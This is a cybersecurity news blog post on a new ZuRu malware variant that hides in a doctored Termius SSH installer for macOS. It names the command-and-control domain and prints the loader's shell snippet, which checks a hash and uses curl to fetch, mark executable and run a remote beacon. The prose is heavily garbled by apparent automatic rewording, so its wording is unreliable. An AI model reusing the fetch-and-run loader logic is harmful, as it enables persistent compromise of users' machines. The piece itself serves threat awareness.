Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
New ZuRu Malware Variant Weaponizes Termius SSH Client to Attack macOS Users

New ZuRu Malware Variant Weaponizes Termius SSH Client to Attack macOS Users

Posted on July 23, 2025July 23, 2025 By CWS

A recent pressure of the long-running macOS.ZuRu household has surfaced, hiding inside a doctored of the favored Termius SSH consumer and quietly turning developer workstations into distant footholds.

First seen in late Could 2025, the 248 MB rogue disk picture appears to be like and behaves like the real installer however stealthily inserts a 25 MB Mach-O binary into the Termius Helper bundle.

As soon as launched, the counterfeit helper runs the official .Termius Helper1 to protect regular UX whereas spawning a loader dubbed .localized, which drops a modified Khepri command-and-control beacon below /tmp/.fseventsd and begins polling its operator each 5 seconds over port 53.

Polyswarm analysts recognized the pattern’s C2 sample—ctl01.macnavicat[.]com with the Baidu decoy area—linking it to earlier ZuRu infrastructure.

As a result of the implant swaps Termius’s developer signature for an ad-hoc one, Gatekeeper’s belief mannequin is sidestepped, letting the bundle execute with out notarization dialogs.

macOS.ZuRu

The marketing campaign particularly targets IT workers and software program engineers who favor third-party terminals, underscoring the rising danger posed by pirated or tampered productiveness apps.

Past information theft, the improved beacon can switch arbitrary information, run shell directions, and seize output, granting operators persistent, high-fidelity management of compromised Macs.

The rest of this report drills into the an infection mechanism that makes ZuRu’s newest construct each elusive and resilient.

The loader’s first process is integrity verification. It computes an MD5 hash of the resident beacon and, if the outcome diverges from the hard-coded checksum, silently refreshes it from the C2 earlier than chaining execution again to the consumer’s session.

The logic is compact but efficient:-

EXPECTED_HASH=”8ac593fbe69ae93de505003eff446424″
CURRENT_HASH=$(md5 -q /tmp/.fseventsd/Khepri)
[ “$CURRENT_HASH” != “$EXPECTED_HASH” ] && curl -s
-o /tmp/.fseventsd/Khepri
chmod +x /tmp/.fseventsd/Khepri && /tmp/.fseventsd/Khepri &

This self-healing step thwarts rudimentary file-based detections by guaranteeing the payload is at all times pristine.

Coupled with the five-second heartbeat and background-daemon mode toggle, ZuRu maintains low-latency entry even throughout reboots, highlighting how a single compromised utility can cascade into full-scale community publicity for macOS-centric engineering groups.

Increase detection, scale back alert fatigue, speed up response; all with an interactive sandbox constructed for safety groups -> Strive ANY.RUN Now

Cyber Security News Tags:Attack, Client, macOS, Malware, SSH, Termius, Users, Variant, Weaponizes, ZuRu

Post navigation

Previous Post: Jetflicks Illegal Paid Streaming Service Operators Jailed for 7 Years
Next Post: Key Administrator of World’s Most Popular Dark Web Cybercrime Platform Arrested

Related Posts

Windows BitLocker Bypass Vulnerability Let Attackers Bypass Security Feature Windows BitLocker Bypass Vulnerability Let Attackers Bypass Security Feature Cyber Security News
Wing FTP Server Vulnerability Actively Exploited Wing FTP Server Vulnerability Actively Exploited Cyber Security News
Graphite Spyware Exploits Apple iOS Zero-Click Vulnerability to Attack Journalists Graphite Spyware Exploits Apple iOS Zero-Click Vulnerability to Attack Journalists Cyber Security News
CISA Releases Best Security Practices Guide for Hardening Microsoft Exchange Server CISA Releases Best Security Practices Guide for Hardening Microsoft Exchange Server Cyber Security News
ShinyHunters Claims Data Theft from 200+ Companies via Salesforce Gainsight Breach ShinyHunters Claims Data Theft from 200+ Companies via Salesforce Gainsight Breach Cyber Security News
Lazarus APT Group New ScoringMathTea RAT Enables Remote Command Execution Among Other Capabilities Lazarus APT Group New ScoringMathTea RAT Enables Remote Command Execution Among Other Capabilities Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Muddled Libra Exploits VMware vSphere in Cyber Attack
  • Feiniu NAS Devices Targeted in Major Botnet Attack
  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Muddled Libra Exploits VMware vSphere in Cyber Attack
  • Feiniu NAS Devices Targeted in Major Botnet Attack
  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News